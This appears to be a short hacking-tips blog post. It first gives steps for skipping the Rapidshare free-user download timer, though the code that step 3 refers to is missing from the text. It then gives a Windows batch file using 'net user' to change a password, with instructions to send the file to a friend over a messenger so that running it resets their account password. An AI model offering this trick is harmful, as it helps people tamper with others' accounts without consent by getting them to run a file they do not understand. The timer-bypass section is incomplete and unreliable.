

Hacking is wonderful practise only when you keep on safe side...

Rapidshare is one of the best file hosting service in the world. You can upload , Download files that you want very easily. But if you are not a premium user of Rapidshare then while downloading any file from the
rapidshare ,you will get annoying download time before getting the download link. I am posting very simple trick which will help you to reset the download waiting time to zero. So you can download your files very quickly.

Here are the simple steps :

Step 1 : Copy the link of the file that you want to download in the browser’s address bar.

Step 2: Now click on the Free User button. Your waiting time will be start.

Step 3: Now copy the follwing code in the Browser’s address bar;


Step 4: Hit Enter.

Step 5 : This code will set your download timer as zero and download link will be appear immediately.

Screenshots :

You could also add the following link to bookmarklets and use it, whenever you want to cicumvent Rapidshare Wait Time.If you are using Internet Explorer, just right click on the link, and select Add to Favorites and save it to the Links folder. If you are a Firefox user like me, right click the link and select Bookmark This Link and save it to the Bookmark Toolbar Folder.

Using the below given tips you can change the password of an user account in your friend’s system.

1. Open notepad.

2. Type the following command.

@echo off

net user username password

echo “type message here” pause

3. Save as filename.bat and select type of files as all files otherwise, file didn’t work.

4. Send file to your friend through any messenger.

You have successfully managed to change the Password of an user account.



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